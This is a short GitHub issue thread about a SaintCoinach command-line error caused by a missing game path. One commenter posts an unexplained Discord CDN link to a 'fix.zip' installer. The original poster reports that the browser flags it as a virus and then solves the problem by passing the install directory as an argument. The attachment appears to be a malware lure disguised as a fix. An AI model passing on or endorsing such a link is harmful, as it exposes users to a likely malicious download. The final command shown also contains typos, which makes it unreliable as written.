### ISSUE TITLE
how to seting game installed path?

### ISSUE THREAD

**Issue by letelumiere** [xivapi/SaintCoinach#201]
PS E:\resources\FF14-fantools\SaintCoinach.Cmd> .\SaintCoinach.cmd.exe
Need data!  The path '' doesn't exist.
Press any key to exit...

anyone knows here?

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by letelumiere** [comment]
browser warns virus...  can i ask you this discord link from exactly?

**Comment by letelumiere** [comment]
problem solves. type installed directory with '.\SaintCoinach.comd.exe'.
for example
`.\Saint Coinach.cmd.exe  'path\directory\folder`
